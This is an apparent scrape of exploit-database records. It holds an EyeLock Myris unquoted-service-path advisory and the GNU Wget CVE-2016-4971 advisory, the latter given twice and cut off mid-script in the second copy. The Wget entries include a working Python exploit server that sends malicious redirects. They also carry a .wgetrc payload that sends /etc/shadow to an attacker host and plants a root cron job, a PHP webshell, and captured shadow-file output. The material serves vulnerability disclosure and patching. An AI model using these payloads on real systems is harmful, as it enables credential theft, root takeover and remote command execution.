{"zdt": [{"lastseen": "2018-04-14T23:54:01", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2016-08-10T00:00:00", "published": "2016-08-10T00:00:00", "id": "1337DAY-ID-25631", "href": "https://0day.today/exploit/description/25631", "type": "zdt", "title": "EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation", "sourceData": "\ufeffEyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation\r\n \r\n \r\nVendor: EyeLock, LLC\r\nProduct web page: http://www.eyelock.com\r\nAffected version: 3.3.21289.1311\r\n \r\nSummary: myris\u00ae provides unparalleled security, is portable, lightweight\r\nand is as easy as looking in a mirror. Use myris to quickly and easily\r\nenroll users for EyeLock\u2019s access control products or to grant users\r\naccess to corporate domain environments within seconds\u2014users never have\r\nto type their username and password again.\r\n \r\nDesc: The application suffers from an unquoted search path issue impacting\r\nthe service 'MyrisService' for Windows deployed as part of Myris solution.\r\nThis could potentially allow an authorized but non-privileged local user to\r\nexecute arbitrary code with elevated privileges on the system. A successful\r\nattempt would require the local user to be able to insert their code in the\r\nsystem root path undetected by the OS or other security applications where\r\nit could potentially be executed during application startup or reboot. If\r\nsuccessful, the local user\u2019s code would execute with the elevated privileges\r\nof the application.\r\n \r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5355\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php\r\n \r\n \r\n10.06.2016\r\n \r\n--\r\n \r\n \r\nC:\\Users\\joxy>sc qc MyrisService\r\n[SC] QueryServiceConfig SUCCESS\r\n \r\nSERVICE_NAME: MyrisService\r\n TYPE : 10 WIN32_OWN_PROCESS\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Eyelock Corporation\\MyrisSDK\\bin\\MyrisService.exe\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Myris SDK Service\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25631"}, {"lastseen": "2018-04-08T23:45:07", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "id": "1337DAY-ID-25433", "href": "https://0day.today/exploit/description/25433", "type": "zdt", "title": "GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n \r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n \r\nhttps://www.gnu.org/software/wget/\r\n \r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nBecause of lack of sufficient controls in wget, when user downloads a file \r\nwith wget, such as:\r\n \r\nwget http://attackers-server/safe_file.txt\r\n \r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \r\ncontaining FTP server reference in response to the victim's wget request. \r\n \r\nFor example, if the attacker's server replies with the following response:\r\n \r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n \r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. \r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. \r\n \r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n \r\nExecution flow:\r\n \r\n[email\u00a0protected]:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n \r\n[email\u00a0protected]:~$ pwd\r\n/home/victim\r\n \r\n[email\u00a0protected]:~$ ls\r\n[email\u00a0protected]:~$ \r\n \r\n[email\u00a0protected]:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... done.\r\nLength: 55 (unauthoritative)\r\n \r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n \r\n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55]\r\n \r\n \r\n[email\u00a0protected]:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\n[email\u00a0protected]:~$ \r\n \r\n \r\nThis vulnerability will not work if extra options that force destination\r\nfilename are specified as a paramter. Such as: -O /tmp/output\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n \r\nAnother limitation is that attacker exploiting this vulnerability can only\r\nupload his malicious file to the current directory from which wget was run, \r\nor to a directory specified by -P option (directory_prefix option).\r\nThis could however be enough to exploit wget run from home directory, or\r\nwithin web document root (in which case attacker could write malicious php files\r\nor .bash_profile files).\r\n \r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n \r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as destination directory for all downloaded files in future,\r\nas well as set a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers to which they could send further \r\nmalicious responses.\r\n \r\n \r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n \r\ndir_prefix = string\r\n Top of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122.\r\n \r\npost_file = file\r\n Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122.\r\n \r\nrecursive = on/off\r\n Recursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122.\r\n \r\ntimestamping = on/off\r\n Allows to overwrite existing files.\r\n \r\ncut_dirs = n\r\n Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).\r\n \r\nhttp_proxy \r\n HTTP Proxy server\r\n \r\nhttps_proxy \r\n HTTPS Proxy server\r\n \r\noutput_document = file\r\n Set the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122.\r\n \r\ninput = file\r\n Read the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122.\r\n \r\nmetalink-over-http\r\n Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n \r\n \r\n \r\nFull list of .wgetrc options can be found in:\r\n \r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n \r\n \r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n \r\n \r\n1) Cronjob with wget scenario\r\n \r\nOften wget is used inside cronjobs. By default cronjobs run within home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications used to download \r\nnew version of databases, requesting web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. \r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n \r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n \r\nSuch setup could be abused by attackers to upload .bash_profile file through\r\nwget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. \r\n \r\nAs cron runs priodically attackers, could also write out .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them an almost instant root code \r\nexecution.\r\n \r\n \r\nIt is worth noting that if an attacker had access to local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n \r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. \r\nIn many cases the cron jobs (as in examples above) are set up to request \r\nvarious web scripts e.g: \r\nhttp://localhost/clean-cache.php \r\n \r\nIf the file was writable by apache, and attacker had access to www-data/apache \r\naccount, they could modify it to return malicious Location header and exploit \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n \r\n \r\nFor simplicity we can assume that attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n \r\nThe root cronjob on the victim server may look as follows:\r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n \r\n \r\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n \r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n \r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n \r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n \r\n \r\nAt this point attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n \r\n#!/usr/bin/env python\r\n \r\n#\r\n# Wget 1.18 < Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971 \r\n#\r\n \r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket;\r\n \r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n self.send_response(301)\r\n new_path = '%s'%('ftp://[email\u00a0protected]%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n print \"Sending redirect to %s \\n\"%(new_path)\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n \r\n def do_POST(self):\r\n # In here we will receive extracted file and install a PoC cronjob\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n content_len = int(self.headers.getheader('content-length', 0))\r\n post_body = self.rfile.read(content_len)\r\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n \r\n print \"Sending back a cronjob script as a thank-you for the file...\" \r\n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(ROOT_CRON)\r\n \r\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n \r\n return\r\n \r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n \r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n \r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n \r\nprint \"Ready? Is your FTP server running?\"\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n print \"FTP is down :( Exiting.\"\r\n exit(1)\r\n \r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n \r\nhandler.serve_forever()\r\n \r\n \r\n---[ eof ]---\r\n \r\n \r\n \r\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n \r\nThe output should look similar to:\r\n \r\n \r\n---[ wget-exploit.py output ]---\r\n \r\nattackers-server# python ./wget-exploit.py \r\n \r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n \r\nServing wget exploit on port 80...\r\n \r\n \r\nWe have a volunteer requesting /database.db by GET :)\r\n \r\nUploading .wgetrc via ftp redirect vuln. It should land in /root \r\n \r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://[email\u00a0protected]:21/.wgetrc \r\n \r\nWe have a volunteer requesting /database.db by POST :)\r\n \r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n \r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n \r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n \r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \r\n \r\n---[ output eof ]---\r\n \r\n \r\nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n \r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n \r\n[email\u00a0protected]:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\n \r\n2) PHP web application scenario\r\n \r\nIf wget is used within a PHP script e.g.:\r\n \r\n<?php\r\n \r\n// Update geoip data\r\n \r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\"); \r\n \r\n?>\r\n \r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n \r\n<?php\r\n //webshell.php\r\n \r\n system($_GET['cmd']);\r\n?>\r\n \r\nby using the wget-exploit script described in example 1.\r\n \r\nAfter the upload he could simply execute the script and their shell\r\ncommand by a GET request to:\r\n \r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker access remote access to the\r\nsystem, or privilege escalation. It could be possible for attackers to escalate\r\nto root user if wget is run via root cronjob as it is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe networ who are able to intercept/modify the network traffic.\r\n \r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com\r\n \r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n \r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n \r\nX. CREDITS\r\n-------------------------\r\n \r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25433"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:23", "bulletinFamily": "exploit", "description": "", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "href": "https://packetstormsecurity.com/files/137795/GNU-Wget-Arbitrary-File-Upload-Potential-Remote-Code-Execution.html", "id": "PACKETSTORM:137795", "type": "packetstorm", "title": "GNU Wget Arbitrary File Upload / Potential Remote Code Execution", "sourceData": "`============================================= \n- Release date: 06.07.2016 \n- Discovered by: Dawid Golunski \n- Severity: High \n- CVE-2016-4971 \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nGNU Wget < 1.18 Arbitrary File Upload / Potential RCE \n \n \nII. BACKGROUND \n------------------------- \n \n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc. \n \nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy \n\" \n \nhttps://www.gnu.org/software/wget/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \ncompromised web server) can be tricked into saving an arbitrary remote file \nsupplied by an attacker, with arbitrary contents and filename under \nthe current directory and possibly other directories by writing to .wgetrc. \nDepending on the context in which wget is used, this can lead to remote code \nexecution and even root privilege escalation if wget is run via a root cronjob \nas is often the case in many web application deployments. \nThe vulnerability could also be exploited by well-positioned attackers within \nthe network who are able to intercept/modify the network traffic. \n \n \nIV. DESCRIPTION \n------------------------- \n \nBecause of lack of sufficient controls in wget, when user downloads a file \nwith wget, such as: \n \nwget http://attackers-server/safe_file.txt \n \nan attacker who controls the server could make wget create an arbitrary file \nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \ncontaining FTP server reference in response to the victim's wget request. \n \nFor example, if the attacker's server replies with the following response: \n \nHTTP/1.1 302 Found \nCache-Control: private \nContent-Type: text/html; charset=UTF-8 \nLocation: ftp://attackers-server/.bash_profile \nContent-Length: 262 \nServer: Apache \n \nwget will automatically follow the redirect and will download a malicious \n.bash_profile file from a malicious FTP server. \nIt will fail to rename the file to the originally requested filename of \n'safe_file.txt' as it would normally do, in case of a redirect to another \nHTTP resource with a different name. \n \nBecause of this vulnerability, an attacker is able to upload an arbitrary file \nwith an arbitrary filename to the victim's current directory. \n \nExecution flow: \n \nvictim@trusty:~$ wget --version | head -n1 \nGNU Wget 1.17 built on linux-gnu. \n \nvictim@trusty:~$ pwd \n/home/victim \n \nvictim@trusty:~$ ls \nvictim@trusty:~$ \n \nvictim@trusty:~$ wget http://attackers-server/safe-file.txt \nResolving attackers-server... 192.168.57.1 \nConnecting to attackers-server|192.168.57.1|:80... connected. \nHTTP request sent, awaiting response... 302 Found \nLocation: ftp://192.168.57.1/.bash_profile [following] \n=> \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 \nConnecting to 192.168.57.1:21... connected. \nLogging in as anonymous ... Logged in! \n==> SYST ... done. ==> PWD ... done. \n==> TYPE I ... done. ==> CWD not needed. \n==> SIZE .bash_profile ... 55 \n==> PASV ... done. ==> RETR .bash_profile ... done. \nLength: 55 (unauthoritative) \n \n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s \n \n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55] \n \n \nvictim@trusty:~$ ls -l \ntotal 4 \n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile \nvictim@trusty:~$ \n \n \nThis vulnerability will not work if extra options that force destination \nfilename are specified as a paramter. Such as: -O /tmp/output \nIt is however possible to exploit the issue with mirroring/recursive options \nenabled such as -r or -m. \n \nAnother limitation is that attacker exploiting this vulnerability can only \nupload his malicious file to the current directory from which wget was run, \nor to a directory specified by -P option (directory_prefix option). \nThis could however be enough to exploit wget run from home directory, or \nwithin web document root (in which case attacker could write malicious php files \nor .bash_profile files). \n \nThe current directory limitation could also be bypassed by uploading a .wgetrc \nconfig file if wget was run from a home directory. \n \nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget \nsettings such as destination directory for all downloaded files in future, \nas well as set a proxy setting to make future requests go through a malicious \nproxy server belonging to the attackers to which they could send further \nmalicious responses. \n \n \nHere is a set of Wget settings that can be helpful to an attacker: \n \ndir_prefix = string \nTop of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122. \n \npost_file = file \nUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122. \n \nrecursive = on/off \nRecursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122. \n \ntimestamping = on/off \nAllows to overwrite existing files. \n \ncut_dirs = n \nIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option). \n \nhttp_proxy \nHTTP Proxy server \n \nhttps_proxy \nHTTPS Proxy server \n \noutput_document = file \nSet the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122. \n \ninput = file \nRead the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122. \n \nmetalink-over-http \nIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \nThen it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download. \n \n \n \nFull list of .wgetrc options can be found in: \n \nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands \n \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n1) Cronjob with wget scenario \n \nOften wget is used inside cronjobs. By default cronjobs run within home \ndirectory of the cronjob owner. \nSuch wget cronjobs are commonly used with many applications used to download \nnew version of databases, requesting web scripts that perform scheduled tasks \nsuch as rebuilding indexes, cleaning caches etc. \nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \nthe Internet with exploitable wget cronjobs: \n \nhttps://codex.wordpress.org/Post_to_your_blog_using_email \nhttps://docs.moodle.org/2x/ca/Cron \nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site \nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel \n \nSuch setup could be abused by attackers to upload .bash_profile file through \nwget vulnerability and run commands in the context of the victim user upon \ntheir next log-in. \n \nAs cron runs priodically attackers, could also write out .wgetrc file in the \nfirst response and then write to /etc/cron.d/malicious-cron in the second. \nIf a cronjob is run by root, this would give them an almost instant root code \nexecution. \n \n \nIt is worth noting that if an attacker had access to local network they could \npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \nresponses to wget requests. \n \nThis issue could also be exploited by attackers who have already gained \naccess to the server through a web vulnerability to escalate their privileges. \nIn many cases the cron jobs (as in examples above) are set up to request \nvarious web scripts e.g: \nhttp://localhost/clean-cache.php \n \nIf the file was writable by apache, and attacker had access to www-data/apache \naccount, they could modify it to return malicious Location header and exploit \nroot cronjob that runs the wget request in order to escalate their privileges \nto root. \n \n \nFor simplicity we can assume that attacker already has control over the server \nthat the victim sends the request to with wget. \n \nThe root cronjob on the victim server may look as follows: \n \nroot@victim:~# cat /etc/cron.d/update-database \n# Update database file every 2 minutes \n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1 \n \n \nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \nand starts an FTP server: \n \nattackers-server# mkdir /tmp/ftptest \nattackers-server# cd /tmp/ftptest \n \nattackers-server# cat <<_EOF_>.wgetrc \npost_file = /etc/shadow \noutput_document = /etc/cron.d/wget-root-shell \n_EOF_ \n \nattackers-server# sudo pip install pyftpdlib \nattackers-server# python -m pyftpdlib -p21 -w \n \n \nAt this point attacker can start an HTTP server which will exploit wget by \nsending malicious redirects to the victim wget's requests: \n \n---[ wget-exploit.py ]--- \n \n#!/usr/bin/env python \n \n# \n# Wget 1.18 < Arbitrary File Upload Exploit \n# Dawid Golunski \n# dawid( at )legalhackers.com \n# \n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n# \n# CVE-2016-4971 \n# \n \nimport SimpleHTTPServer \nimport SocketServer \nimport socket; \n \nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): \ndef do_GET(self): \n# This takes care of sending .wgetrc \n \nprint \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \nprint \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\" \nself.send_response(301) \nnew_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) ) \nprint \"Sending redirect to %s \\n\"%(new_path) \nself.send_header('Location', new_path) \nself.end_headers() \n \ndef do_POST(self): \n# In here we will receive extracted file and install a PoC cronjob \n \nprint \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \ncontent_len = int(self.headers.getheader('content-length', 0)) \npost_body = self.rfile.read(content_len) \nprint \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body) \n \nprint \"Sending back a cronjob script as a thank-you for the file...\" \nprint \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\" \nself.send_response(200) \nself.send_header('Content-type', 'text/plain') \nself.end_headers() \nself.wfile.write(ROOT_CRON) \n \nprint \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\" \n \nreturn \n \nHTTP_LISTEN_IP = '192.168.57.1' \nHTTP_LISTEN_PORT = 80 